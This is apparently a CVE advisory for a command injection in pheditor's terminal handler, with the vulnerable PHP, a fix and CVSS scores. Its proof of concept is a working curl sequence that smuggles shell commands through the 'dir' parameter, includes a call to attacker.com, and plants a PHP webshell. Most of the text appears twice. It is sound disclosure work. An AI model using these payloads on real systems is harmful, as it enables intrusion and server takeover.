← Back to CVE List
CVE-2026-48030NVD
Vulnerability Summary
### Summary
An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.
### Details
The terminal handler in pheditor.php accepts two POST parameters: `command` and `dir`. Shell metacharacters are validated on `$command` only β `$dir` is passed to shell_exec() without any sanitization.
Vulnerable code (pheditor.php, line 554β586):
```php
$command = $_POST['command']; // β metacharacters checked
$dir = $_POST['dir']; // β NOT checked β vulnerable
if (strpos($command, '&') !== false ||
strpos($command, ';') !== false ||
strpos($command, '||') !== false) {
die(...); // only guards $command, not $dir
}
$output = shell_exec(
(empty($dir) ? null : 'cd ' . $dir . ' && ')
. $command . ' && echo \ ; pwd' // β $dir injected here
);
```
An attacker sends `dir=/tmp; curl attacker.com #` β the semicolon in $dir is never checked, so the injected command executes freely.
Fix: replace `$dir` with `escapeshellarg($dir)` on line 586.
### PoC
Requirements: valid credentials, terminal permission enabled (default)
Step 1 β Authenticate:
```bash
curl -c cookies.txt -X POST http://TARGET/pheditor.php \
-d "pheditor_password=admin" -L > /dev/null
```
Step 2 β Get CSRF token:
```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
```
Step 3 β Confirm curl is blocked via command field:
```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=curl https://ifconfig.me" \
--data-urlencode "dir=/tmp"
β {"error":true,"message":"Command not allowed"}
```
Step 4 β Bypass whitelist via dir injection:
```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"
β {"error":false,"message":"OK","dir":"<PUBLIC_IP>"}
```
Step 5 β Full RCE via webshell:
```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/var/www/html; echo '<?php system($_GET["c"]);?>' > /var/www/html/shell.php #"
curl "http://TARGET/shell.php?c=id"
β uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Impact
OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:
- Execute arbitrary OS commands as the web server user
- Bypass the TERMINAL_COMMANDS whitelist entirely
- Deploy persistent PHP webshells to the webroot
- Read, write, or delete any file accessible to the web server
- Potentially compromise other applications on the same server
An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.
### Details
The terminal handler in pheditor.php accepts two POST parameters: `command` and `dir`. Shell metacharacters are validated on `$command` only β `$dir` is passed to shell_exec() without any sanitization.
Vulnerable code (pheditor.php, line 554β586):
```php
$command = $_POST['command']; // β metacharacters checked
$dir = $_POST['dir']; // β NOT checked β vulnerable
if (strpos($command, '&') !== false ||
strpos($command, ';') !== false ||
strpos($command, '||') !== false) {
die(...); // only guards $command, not $dir
}
$output = shell_exec(
(empty($dir) ? null : 'cd ' . $dir . ' && ')
. $command . ' && echo \ ; pwd' // β $dir injected here
);
```
An attacker sends `dir=/tmp; curl attacker.com #` β the semicolon in $dir is never checked, so the injected command executes freely.
Fix: replace `$dir` with `escapeshellarg($dir)` on line 586.
### PoC
Requirements: valid credentials, terminal permission enabled (default)
Step 1 β Authenticate:
```bash
curl -c cookies.txt -X POST http://TARGET/pheditor.php \
-d "pheditor_password=admin" -L > /dev/null
```
Step 2 β Get CSRF token:
```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
```
Step 3 β Confirm curl is blocked via command field:
```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=curl https://ifconfig.me" \
--data-urlencode "dir=/tmp"
β {"error":true,"message":"Command not allowed"}
```
Step 4 β Bypass whitelist via dir injection:
```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"
β {"error":false,"message":"OK","dir":"<PUBLIC_IP>"}
```
Step 5 β Full RCE via webshell:
```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/var/www/html; echo '<?php system($_GET["c"]);?>' > /var/www/html/shell.php #"
curl "http://TARGET/shell.php?c=id"
β uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Impact
OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:
- Execute arbitrary OS commands as the web server user
- Bypass the TERMINAL_COMMANDS whitelist entirely
- Deploy persistent PHP webshells to the webroot
- Read, write, or delete any file accessible to the web server
- Potentially compromise other applications on the same server
CVSS v3.1 Base Metrics
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredLow
User InteractionNone
ScopeChanged
ConfidentialityHigh
IntegrityHigh
AvailabilityHigh